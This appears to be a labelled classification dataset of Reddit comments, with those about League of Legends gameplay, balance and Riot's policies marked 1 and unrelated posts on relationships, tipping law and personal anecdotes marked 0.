big problem and I completely agree with you on that point.   > Riot should have a Staff of GM that deal with these cases personally.   This is actually how it worked before the tribunal was created. I don't have the figures on me, but even during S1 (when LoL playerbase was a  mere fraction  of what it is now) there were simply too many reports for a human to sort and adjudicate. The tribunal was a great idea to outsource this onto the community.   > I feel like players should have incentive to be helpful to their peers.   Riot's stance on this topic tends to be that "fake" helpfulness is the result you get from giving players material incentives and that's not what they want. This is shown by their removal of tribunal IP and their refusal to tie honor with rewards. I used to agree with this stance. But I've since realized how idealist it is. Once you reach a certain threshold,  "fake" manners are probably better than none at all.   > I don't play much DotA, but from what I know, they have a sort of "Low-Priority Queue"   We have to ask whether we want to fix the problem or just be in a nice little gated community where the problem can be far away from us.  Low priority queue is a way to sweep the problem under the rug.  Players may not know why they are being punished or even that they are being punished at all. In both general society and video games, we want to reform people, not punish them and this "prisoner's island" idea is a very "out of sight, out of mind" way to band-aid the problem.   I'm aware that this feature exists in Dota 2, unfortunately I don't play enough of it nowadays to comment on its effectiveness or what the low-priority players experience.   A final point that I think is very important is correctly aligning player's intentions. I've talked a lot about this topic here. [This is a comment]( I made that explains what I mean. I think a lot of toxicity can be avoided just by getting like-minded players to play with each other. However, even people on this subreddit seem to not care about the distinction between RANKED and NORMALS. Team builder is actually a great start to this.   Finally, within the previous link above is another link in which I breakdown why Korean servers seem to have less trolls. The main point there is that  most Koreans actually PAY to play the game indirectly  as they are paying for time in PC cafes. I'm not saying that we should make LoL into a pay-to-play game (although I'm sure this would reduce toxicity significantly). What I am saying is that there needs to be consequences for acting like an ass, besides the vague threat of a tribunal that's out there somewhere.
0	The thumbnail is, obviously, smaller than the source image. So, if you know how reddit creates the thumbnail, you can make the image show whatever thumbnail you want.   When creating a thumbnail, reddit scales the image down, and in doing so, removes a lot of pixels. This removal of pixels from the image in order to scale it down can be done in a number of ways. Two common ones are to literally dump pixels that aren't needed anymore, thus losing a lot of information from the picture. The other way is to do a sort of "averaging" of an area of pixels, and use that "average" to scale some set of pixels down to one.   Now, I don't know which redidt uses, but this guy found a way to make an image of Zoidberg that has the proper colored pixels in the proper places so that when reddit scales the image down for a thumbnail, you get a picture of Fry instead. The fact that the two images are so very similar means that the full sized Zoidberg image doesn't look dithered and compressed, which you tend to see when people do this trick with two very different images.
1	The way I see it the problem that jungle always had was it's early game difficulty vs. mid-late game insignificance. Now the jump seems even wider. The way I see an ideal jungle would be lower stats for first clears (compared to now) and much higher scaling - imagine jungle around 20 minute mark where to clear it whole you still have to sacrifice around 50% of your health. That would make the junglers choose between ganking and farming.
1	Is it a bad trend though, do you actually see an inherent problem with the mechanic besides "unoriginality".   In my opinion, if I'm allowed to have one on reddit, the "3rd-hit thing" as you try to ridicule it, provides a healthy addition to character kits. Let me elaborate, 3rd-hit things usually reward users with an additional effect upon achieving this particular condition: Yasuo gets a knock up, Vayne gets to deal true damage, Gnar gets to deal more damage and a speed boost, Vi shatters armor and deals more damage, etc.   And why is this mechanic, according to my opinion, good? Because it smooths snowballing in either way (in favor of the user or the opponent). How does it accomplish it? If you as Vayne, are so far ahead, say with BotRK+PD+IE, chances are your target is dead before you even connect a third hit or that the true damage portion is less significant than the damage portion provided by your item advantage. However, if you are far behind, say with only BotRK+Boots, you are rewarded for taking the risk of going against an enemy with an item advantage over you and that 3rd-hit thing's true damage is now very very significant.
1	Sorry, but I think that you're basically discouraging people to play aggressively this way.   I understand that you may be often annoyed by teammates that do overly aggressive things and mess up, because you can see the big "Your Teammate has been killed by his Opponent" message in your screen. But since there is no "Your Teammate failed to make use of a good opportunity" message, you may not be aware of all the times that your teammate was playing overly passive.   Not making use of a good opportunity to, for example, dive a tower is equally as bad as diving it when you should not have. The difference is that it is tough to estimate (particularly for new players) whether you will or will not make the kill, so not-diving is the easy choice (especially when thinking about the flaming that would ensue a bad decision). However, my advice for inexperienced players would be to go for it and dive the tower, if you think that you have a good chance. Sure, you will miscalculate quite some times, but after a while you will get a hang of it. You have to learn to spot a good chance, as well as knowing when to back off.
1	I don't know how to feel about this Zed nerf.   I mean it has the potential to open up the field more outplays since the shadow is now at a location apart from being right behind the target, but this also means that Zed won't get the old damage output that his ult combo originally had. In fact, I believe he would actually have to work desperately for his kill.   Essentially, this change not only how Zed function as a champion, but changes his entire play style as well. I believe Zed players will have to rework their mechanical skills to actually play him now.
1	I think I will quote "At_Least_100_Wizards" >Thank you for this. Twin Shadows is better on Lux than Lich Bane is in every regard. If you are in basic attack range as Lux then you are fucking up. If you are in basic attack range as Lux and the enemy hasn't dove/killed you already, the enemy team is fucking up. Don't buy an item that requires the enemy to fuck up in order to function well.   So, if you have to die in orther to do damage, you are doing something wrong. I again want to say that it's not a really bad item on her, but there are way better items. You are lux, you HAVE to abuse your range. They shoudlnt get to you in normals situations and if they are chasing you you can use twin shadows or just use them to scout the jungle. Btw, lux has 1767hp at level 18.
0	I don't get this reddit circlejerk over hating people who want you to watch there favorite show. If people tell me I should watch something I do. People told me I should watch Breaking Bad, Doctor Who, Sherlock, and Orange is the New Black and I love those shows and can talk about them with other fans. People told me I should watch House of Cards, Dexter, and Game of Thrones but they just weren't my thing, so now when someone asks me if I have watched them I say "Yes and they weren't my thing." If so many people like something, then chances are it is probably pretty good, if it isn't, at least you tried something new.
1	Everyone says this duo-bruiser bot kills sustain herp-derp mode because Chauster said it.  I watched a game where Chauster and Doublelift ran Blitzstar bottom and they had almost no impact on the game.  Sure they got a kill(they also gave up a double kill), but the problem is they didn't dent the enemy AD carry enough for duo bruiser to be worth running since they will fall off late.  Of course, they made it out like they did well and served their purpose, but they did not.   I am assuming if a mechanically excellent duo like Doublelift + Chauster who have a shit ton of experience bot lane cannot pull this strategy out and snowball dominate with it, neither will the average player.  Duo-bruiser bot does work, but at the same time it's probably the hardest riskiest lane to successfully pull of with random players.  It's such a huge risk too that you will lose the game if that lane doesn't make magic happen.  The risk reward doesn't warrant the gamble in my opinion.  Pro-players base their gameplay around minimized risk too, so that is why this strategy is rarely seen in tournament play.   Ranged AD top loses to a majority of the bruisers due to the combination of abusing brush and mobility champions like Riven/Trynd/Irelia.  Ridiculous sustain and high base damage/steroids makes it easier for the bruiser to zone/deny.  There is a reason bruiser top prevails as the current strategy.  Your best bet top lane is AD Nidalee, she has an attack speed steroid on her heal, massive mobility, brush control, and she is ranged.  I don't see any other ranged AD vs a, competent top, bruiser that could win easier than Nidalee.   Edit:
1	Typically if you buy something for RP ( points bought by real money ) it´s skin if you buy skins thoose skins are on prizes usually 520 and 975 but there are few that cost 1820 wich are legendary and have Remade voiceover and such ( wich new Abillity animations ). And if you want to buy him just RP i guess it would be better to know if he wants a certain skin. Since support of Leage of Legends is kind, nice and friendly you can make yourself an account buy RP there and then buy a skin onto friend´s account by paying from yours wich imho is much more suprising and more like a gift.
0	My problem with this is that you're applying your own feelings onto someone else's relationship. That's great that would wouldn't have forced your boyfriend to throw them out. It's really healthy, especially if you and your BF communicate (really the cornerstone of any healthy relationship, I can't stress that enough).   However, you probably have some other "crazy" tick that you would prefer if people respected. Most of us do. Being in a relationship means working with your partner through these kinds of feelings. Disrespecting them disrespects your partner as well.   In this case the OP lied and hid something from his current SO because he didn't respect that she had a problem with the situation. Was it an irrational problem? That's up for debate. However, irrational or not he should have respected that it was there.   Now, if he feels that it is irrational and would like to try and deal with it then perhaps the best method is to have an open conversation about it. I know that it can be hard sometimes, especially for some men who often have more trouble expressing their feelings, but having an open and frank discussion about these kinds of things is exactly the kind of "communication" that people always say is important. The key is to come into it with an open mind and accept that neither one of you is wrong in how they feel. You may discover a lot that way.   For example, the other day my fiance was talking about her sisters new boyfriend and was telling me about the two of them and her sister's past romantic interests. I guess at one point she said that her sister had a type, "Hunky guys". After a little while of listening I told her I really didn't want to talk about her sister's relationship and broke it off abruptly.   That was completely wrong and irrational of me. I realized a little later that the reason I had done it was because I had been feeling ashamed of my body recently and have been having some real self esteem issues. I hadn't realized it at the time, but her description of other men as "hunky", even though she didn't mean anything by it, had hurt me. Again completely irrational, completely not her fault, but it was there. We talked about that and discussed how I've been feeling and came out with both of us feeling better and stronger for it.   The point is feelings don't need to make sense. That's just how things work in relationships. Sometimes we do things that are illogical and "crazy". As partners (and that's really what you should be) you need to respect that and try and communicate through it.   Unfortunately, no one will read this because its on a 13 hour old thread, but there you go.
0	This memorial day I went to a service with my father and we were sitting on a hill in front of the ceremony. Approximately 10 yards in front of us there is a Vietnam Memorial. It is a large vertical granite stone with a soldier on it. The stone is surrounded by a square path that is enclosed by a large chain.   Here we are enjoying a beautiful day and a particularly moving ceremony, however there are these three young boys (7-10) who are swinging on the chain like it is a god damn swing set. They are playing on the path as if it were a playground.   As the ceremony draws to close a family who lost there father in Vietnam was to place a wreath in remembrance on the memorial.   As this family approaches the memorial, I hear out of the corner of my ear their mother say"kids, that family is going to place the wreath," and the kids ignore their mother and continue swinging and playing in the MIDDLE OF THE FUCKING MEMORIAL.   This family had to practically walk around these kids as they try to honor their departed father.   I don't expect children to remain at attention during the entire ceremony. I don't expect children to remain silent during the entire ceremony. I DO EXPECT parents to exercise absolute control over their young children when the time calls for it.   /endrant
0	A lot of sports also require skill and you have to practice and work to improve your skill: archery, golf, and shooting just to name a few. And sure the Olympic Games isn’t a good example of everyday real life events but a competitive sport is a competitive sport and if you practice and work hard and excel above your competitors you deserve to be rewarded more than your competitors for your hard work and effort.   If you’re not into sports then let’s look at academic competitions. If you want to win a spelling bee you have to study. And when you study and you’re the last one standing you deserve that gold medal. If you’re second or third last person standing you deserve that silver or bronze. Everyone else deserves a “Thanks for participating. Keep studying and next time you might get that top award.”   If you’re not into sports or academia but you’re a hard worker and you work harder than everyone else then a good boss might give you a bonus at the end of the year or at the very least some sort of recognition. Everyone else who “worked to rule” got paid for their job and that’s all they deserve.
1	Okay lets talk basics.   ADC do damage through autoattacks. This means that they have potentially infinite sustained DPS. Any time you are NOT auto-attacking in a teamfight, you are not doing your job as an ADC. If you die as an ADC, your DPS goes down to zero.   What this means is your first priority is being safe and your second priority is to auto-attack anyone even tanks. ADC also have the best ability to shred tanks because their whole item builds are dedicated to damage and items like Last Whisper are built on ADC.
0	Story time.   I moved out of my parents house when I was 21 years old. I went from being very responsible the first few months to a raging alcoholic partying every weekend, like any reputable young lad would do at that age. On one occasion, a good friend of mine lost control of himself and threw up all over the bathroom. I mean everywhere; what he did could be considered a modern art masterpiece.   The next morning, I wake up very early and step over all the people laying on the floor. I felt like I was walking through a liquor-laden battlefield. I go into the bathroom, still very drunk, and realize that I need to get that bathroom cleaned immediately. I found all the cleaning supplies I could find and mixed them all in the bath tub; we're taking bleach, window cleaner, Ajax, ammonia, you name it.  All of a sudden everyone in my living room wakes up coughing and wheezing (as I am, too, scrambling to open up the windows). It was like waking up the dead. So, don't mix chemicals together. You could kill your drunk friends, along with yourself.
1	Now obviously Riot is making money but I hesitate to base any opinion of them based on their finances.  Since they are a private company we don't know their revenue so lets do some quick and dirty math.   A lot of people in this game don't buy anything which means for Riot they are straight losses and every time they log in it costs Riot money.   Lets say it costs .5 cents per hour to run a server for one person (this is not a real number and its probably lower than this but for easy math). Every 40 hrs played it costs Riot $20 per person who doesn't buy anything   For someone who buys one $10 dollar purchase of rp every 40hrs on average Riot loses 10$ per person.   Now lets say you have a person who buys 30$ of rp every 40hrs Riot will gain $10 per person.   Riot lives off of the whales as the gambling industry calls them.  These people will earn Riot say $100 bucks every 40hrs which covers the costs of 5 people who never pay a dime.   Take Riot putting money into E-Sports.  I guarantee that Riot has a graph that shows a huge spike in play time and purchases after LCS, Worlds, OGN, etc.  I personally would not be playing this game nearly as much if I wasn't watching LCS.  So while E-Sports costs quite a bit I know that Riot can see a correlation between spikes in purchases/ play time and LCS.
1	I used to think like that. I had adblocker, then realized what I was doing and disabled it. Then I would start to watch a stream and an ad plays. That is fine. But then every once in a while, something goes wrong ( internet problems, browser freezes, plugin crashes ) and I have to restart the stream. I have to watch the same exact ad again. Sometimes I have to refresh the stream like 5 or 6 times in a row, watching the same ad over and over again before I can get back to the stream. That is more than enough time to miss something. I think adblock is a good way to force those who are creating this content to fix it. If they notice that too many people are blocking their ads, maybe they will start having a larger pool of random ads, prevent an ad from showing if I JUST saw an ad and refresh the stream because it still hasn't loaded, and prevent ads from just enabling my sound for me. Sometimes I have multiple streams up and out of the blue 2 of them are blasting some ad at full blast when I had it muted. I want to support people, but they make it difficult.
0	First of all, personal finances are fungible. The bear minimum cost of raising a child is often far more than the amount required by child support (It is estimated that the cost of raising a single child into adulthood is 1 million dollars.). For a father to say that any money the mom spends on herself was 'his' money is entirely unfalsifiable unless the mother has no income at all. You could just as easily say that she used his money to raise the children and her money to put herself through college.   To illustrate this, let's take an example where the father marks his bills with a blue marker and the mother marks her bills with a pink one. So long as the cost of the mother's education and meals is within the cost of her income she can purchase it with all pink bills and do all child spending with the father's blue bills. Now, suppose we have the same scenario, except we mix up the spending of the blue bills and the pink bills and keep a record of where each is spent. All of a sudden, the father can claim, but she's spending my child support money for the attainment of her assets. While, in this circumstance, what the father says is true, we could still easily arrange the former circumstance(where she only used pink bills on herself) or even the inverse of the former circumstance (in which she spent only the blue marked bills, his money, on herself). At the end of the day, so long as the spending categories don't exceed the limits of their budgets (the number of bills marked the color indicating where they can be spent) within a spending period, you can always rearrange the bill spending so that she spent only her income on herself or only his income on herself while still achieving the exact same effect of material wealth and standard of living. Thus, a person from outside, who didn't have the ledger of which bills were spent where would see either version of the family with the lifestyle and be unable to determine which was which.   Finally, a father could counterfactually argue that were it not for his child support, she could not afford to go to college. Of course, this is likely true, but then, the mother could counterfactually argue, were it not for the cost of rearing their children, she could afford to go to college. Since it is true that in the case where the father would not have to pay child support (the case where they did not make a baby together) the mother could afford to go to college and that in the case where the father would have to pay child support (the case where they did make a baby together) the mother could afford to go to college, the mother's going to college is not contingent upon whether or not the father must pay child support, considering that, were he not having to pay, she would not have children and still be able to go.   Coupling this with the fungibility of money above, the father doesn't have a leg to stand on, unless the mother is spending beyond the means of her own personal income and dipping into the father's blue bills.
1	Let's be honest. You either are polish or you know this language.   "Kurwa" while very common cannot be used so easily in most sentences.   "Fuck" is way easier to use.   If you are not polish  - start thinking "kurwa" means "My bad, I failed miserably" - mostly because it's like saying "fuck" after failing badly.   If somebody would like to insult you in polish... Well... "kurwa" wouldn't be the word.
0	I agree so much with your statement.   I was walking to the bus one day and was crossing a small intersection when this little pickup truck stopped right in the middle of his left turn. I thought he was going to ask me for directions or something, but he started rambling to me about this pizza place a few blocks away and that if I ever needed to take a date anywhere that it was a great place to do that, and it's never very busy because of the location, but I shouldn't get the pasta, just the pizza. I ended up having to just walk away because he wouldn't stop talking and I was going to be late for work. This experience really scared me because I hadn't really thought about the fact that people who were obviously mentally unstable would be able to get their driver's license. Or that the people doing the driving tests would overlook someones mental instability and allow them to have a license.
1	Riots answer to our well deserved request for compensation.     EUW: Riot compensate PLS!     Riot:    EUW: Oh.. ok.   Riot: Now lets get our sh*ts together and get NA some free goods!
1	Dear Riot... The gates are stupid. sure you added a defense to the enemy teams and added a new pathing... and such and defense measures.. but you also added at the same time added one of the biggest Cheese things ever... with the fact that you can enter and exit both sides provides unfair for the team say if you're sieging and catch someone who got caught out... they run through there and easily get away... It's nice but unneeded. Sure you want to change the game up... but don't give them a free pass through so when they get caught out it's fine...
1	This is almost as grand as the game where I was shit-stomping top lane. Support Alistar is shit-stomping mid because our Ryze was DC'ed until 10 minutes in. Sivir is somehow surviving 2v1 bot. Ryze reconnects and does his best to come back, but things are looking grim. Through a series of desperation back-dooring, I am able to push all the way to their inhibitor top, but all it does is delay the inevitable as Alistar ragequits at about 40 minutes in. We stall them out for a while by sneaking a baron. But by now it's 50-something minutes in. The enemy Vlad has 2xDeathcap, WotA, Hourglass and Rylai's (900+AP). We are totally screwed. They go get baron and come to our base for a final push. I ping everyone to fall back and say in chat that our only chance is to Ace them when they attack using our nexus towers to help fight them. Sure enough they all come. In the ensuing battle, the enemy team seeing that it's a 5v4 decide that they're just going to dive us. In the fight we trade 2 for 2. Vlad, their Caitlyn and their lulu are left against me and Sivir, when suddenly Alistar reconnects. He flash-pulv-headbuts Vlad into our fountain then goes on the offensive. I have frozen mallet so Caitlyn isn't going anywhere. We basically trade, but lulu foolishly comes back to finish me off with one of her Q's. In so doing Alistar is able to headbut-pulv her and Sivir kills her.   I frantically ping for them to rush to enemy nexus while I type in chat "Fuck the minions, ali tank the towers." Alistar and sivir then book it to the inhibitor I exposed earlier through backdooring, kill it and the enemy nexus towers and get the nexus to 50% right as the first 2 of the enemy team is respawning. They kill ali and get 2 hits on sivir as she finishes off their nexus.   It was one of the greatest triumphs over adversity I have ever experienced in LoL (and arguably one of the greatest throws I've seen as well).
1	I hit 900+ ping last Wednesday with only League open. Needless to say, it was unplayable. I left the game and out of curiosity opened Heroes of the Storm. Played a 30 minute match with no issues. Haven't played League since, haven't had lag problems since.
0	Every generation does this. "Only people born in the 80's will appreciate this!!" "You young people born after the 70's wont get this reference." It's standard. In a few years the 00's kids will start saying it.
0	Very well written piece. I completely forgot about the
1	The new system does not reward the casual gamer at all... it favors the hardcore, "grinding" type of player.   Due to the "roadblock" that is currently set up to gain both tiers and divisions, it has become extremely difficult as a casual player to have an incentive to even continue playing.   RIOT dropped the ball by trying to make ranked a more "competitive" atmosphere, because in the process, they alienated the millions of casual gamers such as myself who simply don't have the time to grind out thousands of ranked games, but still enjoy the competitive atmosphere.   I already have 3 friends who have stopped playing altogether, finding themselves in the exact same situation you where; they said that it took them "too long" to get anywhere, and that they felt even more anxiety than they did playing last season.   You also have the issue of the V tier, and seeing as they can't be dropped, they troll the tier I's from the division below them to prevent them from getting to a higher division.
1	Probably a little late in here but im posting anyway.   I think the reason you got reported is because you stopped trying or at least made it seem like you stopped caring about the game once you knew you are doing really bad. You didnt even try to redeem yourself.   You became very lighthearted, joking around, throwing smileyfaces through the chat instead of clinging on to the game and trying to change tack. You made it very clear that you wanted this to be over with, seemingly ashamed of how you played up until this point. What you dont realize is that others feel really annoyed by that. They were still trying, they didnt do all that bad, they were willing to carry you, but quickly realized you gave up.   Dont get me wrong, it's a very healthy attitude and makes you able to go optimistic into the next game, but it's really not fair for those teammates who did well and are still willing to move heaven and earth to win with you on their backs. Teammates that hate being called "tryhard" and hate the "if it isnt me carrying I dont want to win" attitude.
0	My mom lost her job in 08. I end up sticking around keeping things afloat so she has a chance to get on my feet again. In the meantime I feel my life was being put on hold and a started growing resentment towards her.   2013 comes around and I've had enough. I realized I had just been enabling her to depend on me for money, social interactions, everything. I was finally able to see her as the human being she was and not as my mommy who could do no wrong.   I moved out. Got a place with my girlfriend. Have been incredibly happy.   What I've learned about myself and family is that I didn't pick these fucking people and I have no obligation to keep them in my life. I'm a son and a brother, not the father role replacement you forced on me. So family, get your own shit together, you're all grown-ups now, and fuck off with your bullshit. I aint interested in it and I don't fucking care!   Forgive the rant... But I thought the same thing going through this process. My dad had an affair, got caught, and pretty much said fuck it I'm out. His dead now and my mother never forgave him or got over it. I think she has narcissistic personality disorder which actually explains  sooooo  much about her behavior.
0	See, I think that's just unfair. I like giving myself 2 points right off the bat so people recognize it. I could make 100s of fake accounts and hit the front page with stupid shit everyday, but where's the fun in that? I can't tell you how many hilarious posts have popped up in r/funny or r/pics and haven't been recognized because people "don't get it" or "think it's  a repost".
0	Heh, all depends on what you're buying.  Bought a phone off of someone when it was brand new, met in a mcdonalds downtown, nicer part of town during the day, all went nice and smooth.   Bought some rims and 33" mud tires off some guy by the docks at night at a STEEP discount.  Now that was some sketchy shit.  Deal ended up going down smoothly and I got my rims, but lets just say everyone knew everyone was carrying a pistol by the time the transaction was complete.
0	So...that makes me bitch whipped or what? My woman will  put up a major fuss  get unreasonably pissed as fuck if I start growing out my beard, she tells me to shave it, and I just put it off. She will explode like I just killed a baby, it's bullshit.   "oh my le god you don't le care about le me, you don't even le care enough to shave you're le face!" *crying ensues*
0	Im going to say this to clear up some stuff in regards to americans and tipping.   What is the minimum wage for workers who receive tips?   The Fair Labor Standards Act (FLSA) requires payment of at least the federal minimum wage to covered, nonexempt employees.  An employer of a tipped employee is only required to pay $2.13 an hour in direct wages if that amount plus the tips received equals at least the federal minimum wage, the employee retains all tips and the employee customarily and regularly receives more than $30 a month in tips. If an employee's tips combined with the employer's direct wages of at least $2.13 an hour do not equal the federal minimum hourly wage, the employer must make up the difference.   Some states have minimum wage laws specific to tipped employees. When an employee is subject to both the federal and state wage laws, the employee is entitled to the provisions which provides the greater benefits.   Source:
0	Okay, this story just happened, and it's insane.  So I got a bit high, not very, but a little. My friend told his sister that he was going to a certain area of town, because he didn't want her to know he was coming to me to get high. So we get a little high, and then his sister calls him and says "oh great, of you're in that area, please pick up these friends of mine and bring them over."  My friend, caught in his own web of lies, had no choice. So we get in the car and drive there and pick up these two girls. They were campers of hers from a camp for sick kids. They were about 16 years old. One of them was a midget, and they were both from super religious families, and were super religious themselves.  So after about 10 minutes in the car, I turn on my phone and open the internet, but I'm high, so I space out, staring blankly at the screen. After about 20 full seconds, my friend looks over and goes "is that... Oh my gosh".  I look down at the screen. My phone is open on reddit, one of the closeups of the dual-dick prominently displayed. I jumped and closed it immediately.  Then my friend says, very quietly "did they stop talking?" And I tried to think if they were before.  Then I started trying to hold back my laugh. We were at a red light, and we just looked at each other, faces red with mirth. This just freaking happened.
1	As an avid thresh player I approve this skin.
1	It's definitely different from Halo and the other FPS' that have had coaches on the MLG circuit.   Halo is very push oriented, and there are very few times you don't have a general idea as to where the enemy team is. Control of the high ground is important and usually the power weapons are up there, so you have an idea as to where everyone wants to be. LoL is different in this because there are many times where you have no idea where the enemy team is. They're just as likely to be camping in your jungle as at Baron when you have no vision. Therefore, an extra pair of eyes goes a much longer way. The ebb and flow of getting power weapons and top control is obvious, and the coach's only real role is to time power weapons and try, keep everyone calm, and tell them about the timings of the objective on an objective game type. They may also see someone the players don't, but with the importance of teamshooting, catching that player doesn't have much consequence when the player is either with someone, or the person they see is with someone.   Also, catching someone out of position in LoL is much more important than in an FPS. Games can be won or lost solely on catching one person out of position (recent example is Xenic Storms top lane in game 1 vs Azubu Blaze on Wednesday morning). This is much less prevalent in an FPS.   Also, lots of tournaments still don't have soundproof booths for League, and a coach has free reign to listen to the callouts of the enemy team. Halo didn't have booths either, but unless a strategic and slow strike was happening from bottom to top in a close game, the coach couldn't hear anything through all of the yelling and focus needed normally. Even then, at those times players will speak more quietly.
1	I beg to differ. KR side did managed to execute with sheer composure and elegance tho. In fact almost every player in KR side out skilled and out played in the matches in terms of vital aspects. I have to emphasize again, the word is almost.   We got to give the accurate and right criticism and not make ourselves feel better by giving nonsensical bias remarks. It just simple spawns a coherent town hall of self delusional individuals and actually start to drift away from the planes of reality. The reality where we need to pull up our socks in order to once again brand ourselves as the top dogs in this game.
1	I really just think they need to let people do this. The only reason I'm not willing to spend money on any of the bundles is because other than skins (which I only care about a couple) I'm not going to get anything out of them. There's still 30ish champions I don't have, and I probably would fork over some cash if I knew that I could save money by buying only champions I want. The discounts are cool, but they honestly don't change my decision.
0	If you've ever worked public service like as a firefighter, emt, paramedic, police or even being a teacher you understand why they're racist. At the same time, the situation is so complicated that you cannot merely blame the victim. Why is this black homeless schizophrenic on the streets shooting up? He exists in a system where his probably single mother did not have the time and/or resources to address his needs, to address mental health, so his issues go unchecked. He self-destructs and is not given a second chance in a society that finds people expendable. Why give this guy a job when there's 10 other people willing to push buttons at walmart? How can you stay motivated and sober in such a situation? The fire/rescue guys see it day in and day out and grow immune to it, just another crackhead / junkie / alcoholic who self-destructs, great. Even just looking at different classrooms in the same HS, you see disparity between the races. You see the white kids in the IB program with supportive doting parents, money in the bank, sending their kids to ivy league; he might be a little shitbag for all we know but he's going somewhere. Then the brown girl in the on-level class who works retail to buy herself a MK bag so she can have nice shit is too busy fixing her hair and clothes to pay attention. The impulse is to think this girl is a dumb hoochie, but you realize that if the context she was in was different she wouldn't end up like that. Of course she's obsessed with her shit, she worked hard for it, but if the white boy breaks the ipad he gets a new one. You're asking for poor people who have nothing to give up material wealth and find some inner inspiration to excel and surpass people who have everything.   I don't know if anyone of you've suffered depression but imagine a whole culture that has depression, low self-esteem, low self-worth and tell them to "snap out of it". It doesn't work that way. You need systematic widespread change over a long period of time to see any appreciable change, and because most people become apathetic to these issues, or in the case of OP, become racist, we don't get the progress we need. Racism isn't necessarily without basis, but I think if you have a deeper understanding of the other party's situation you wouldn't be as dismissive.
0	I understand the argument here but I must say she shouldn't have been marked wrong, the teacher could've simply wrote or 5+5+5+5+5=25. As a college student who is in a class with grown adults, I find that many of them in math know what to do in large algebraic equations (most of the time) but! They forget the basics how to long hand multiply and divide instead many of these adults and a majority always result to their calculators.
0	Well, you seem to be missing my point, which is i don't hate on fat people because of the way they look, i hate that they do nothing about it even if they can, simply because they are lazy. Dietary habits can be changed, and fat people will loose weight, but if a gangster rapper from the 'hood decides to clean up his act and get a job/education or w/e he still remains black. So yeah, if you are lazy enough to endanger your health, and maybe even the health of others by promoting "fat culture", and tell everyone being fat is ok, that's fucked up. Being black or racist has nothing to do with it.   Also i am speaking from experience - used to be a bit overweight, started working out and eating good food and now i look and feel awesome. But even when i was fat, i was never one of those guys that try to defend they're lazyness with bullshit about fat culture or w/e.
0	I mean, not the smell of BO. If my husband hasn't showered until supper time, yeah I'm not gonna be shoving my nose in his pits. And I've heard if some people sweat a LOT they can get bacteria growing in their sweat glands so if you have that issue, use an antibacterial body wash unless you want to be a lady repellent.   But my husband lent me a sweater of his when we were first dating the sort he wore under his coat when it was particularly chilly. So he'd have worn it a few hours a day for a few days, while waiting for the bus. Not super hot out, not a ton of activity to get him sweating and get it stinky. When I was wearing it, I was overwhelmed by how much it just reminded me of HIM. Not even a super discernible scent, I couldn't smell anything unless I shoved my nose right up to the fabric but when I was wearing it I just got this vibe that reminded me of him. I've never been one to really freak out over guys colognes or anything like that so it wasn't expected at all, but I loved it.   Even aside from that, now that we've lived together a few years, I love the smell of the deodorant and shaving cream/aftershave he uses. I wasn't so into it initially, but now I've come to associate it with him so much that when he gets out of the bathroom after shaving I want to mash my face against his and I love kissing his face and neck all over.
1	I started out learning the game by playing premade with level 30 friends. I went wherever but i always played  AP Miss Fortune.     When i properly learned the game and started playing by myself i got flamed for it, so i picked up  Fiddlesticks . As always, i was playing him anywhere and i actually played him very successfully.   After a while (around when i hit level 16) i thought i needed change. One of the only champions that i had ever played before was  Nunu , and i started playing him like a madman.  AP Nunu mid, AP Nunu jungle, AP Nunu everywhere.  People were always flaming me for not picking conventional things, but i was always looking for things that no-one was playing at the moment.     A little while down the road (Level 19-ish) i started playing  Evelynn . Yes, when she was at her weakest.  Old  Evelynn.  "Useless"  Evelynn. I had a lot of fun playing her, even though i admitted that she was pretty damn weak. Playing Evelynn taught me a lot about the game, and together, we achieved greatness.     All great things come to an end though, and that's why i started playing  Swain . I was inspired by HotShotGG's "LULULULUCAWCAWCAWCAW" and "WHY NUNU WHY" videos(i thought they were hilarious). This was around the level that people start to pick up jungling, so i could go solo top. Sometimes i faced duo top's but i sent them packing, no problem. Swain was an underplayed terror, and i enjoyed every second of playing him. All was fine and dandy, but i started to get a feeling of emptiness when playing only one champion..     My solution to this problem: Play every champion. EVERYONE. This lead to me gaining an absolute ton of game knowledge, at cost of not improving very much on one champ. Sure, i had a general sense of what every champion did and how to play them, but i wasn't good at any of them.     This time in my LoL- "career" (Late twenties to 30, and for half a season more.) was when my personality as an "analysist" really showed. I could create godlike tactics and builds, mainly focusing on cheese builds and strategies, and on the theoretical side i was better than almost everyone i knew. When i tried to execute the tactics is where all of this went wrong though. I sucked at the game, and i didn't really give a shit about it. I stopped playing, just talking about the game withh buddies and guiding friends through games  (Okay dude farm up for another wave, then gank bot. The enemy ADC is pushing and the wave will probably be at your teammates' tower in the next 30 seconds.) until...   Evelynn was reworked!   I found fun in the game again, playing  Evelynn  in countless games, and it was like revisiting an old mate. She had changed, but for the better. I almost liked her better this way, and i started jungling her, often building pure AD or a Trinity Force build.     Then Alex Ich played her in the world championships.  AP Eve  became a thing. I started playing mid, and improving a lot. Yes, all of my former strategies were rendered useless because i was pretty much only playing one champion, but it was worth it. I would drop all my cheese tactics, and just play Evelynn. My friends who had ruthlessly stomped me in 1v1's for almost a year quickly learned to bad Eve against me, and i couldnt blame them. My mind was at ease while playing her, it just felt like everything was going to work out. When i was not playing Evelynn, i was playing support. Taric and Lulu caught my interest, but not enough to pull me away from Evelynn.   Then, on christmas eve, my friend gifted me an Evelynn skin.  Shadow Evelynn , to be exact. Since that day, i have  never won a single game with her. I never was good enough to carry my team with her, never ever. I still haven't won with her.  There were points where my match history were 10 Losses in a row, all with Evelynn. Sure, i was almost always getting fed, and i always secured advantages and gold leads for my team. Almost keeping up in farm with my opponent while still roaming a lot and securing kills, dragons and even a couple of towers, but i could never get the job done. I just never carried.  This was not my teammates fault, it was just me never being good enough .   Then Evelynn was nerfed.     I stopped playing her. Close to 300 games played with her, rendered useless in an instant. Fuck Evelynn. Fuck all of that shit. I became an overly polite and nice support, and i still am.  Lulu  and  Janna  were my drugs, but those were drugs to escape my past. I have stopped having fun while playing, and just accepted invites to recieve further doses of my drug, called "supporting". The time i spent "not supporting" was spent in the mid lane, trying to achieve a bond with another champion.     I was desperately trying champions reminiscent to Evelynn. Twisted Fate. Katarina. Diana. I even picked up Lux. I did well with all of them, but i never found myself loving them.  I coudln't "learn to love" anyone.   ...And that's my story about the time i have spent playing LoL, and the champions i played during that time.
1	I agree. Why isnt Mao or Empereror HiroHito a swear word? I come from asian descent and i want my dictators to be accurately represented too!!!
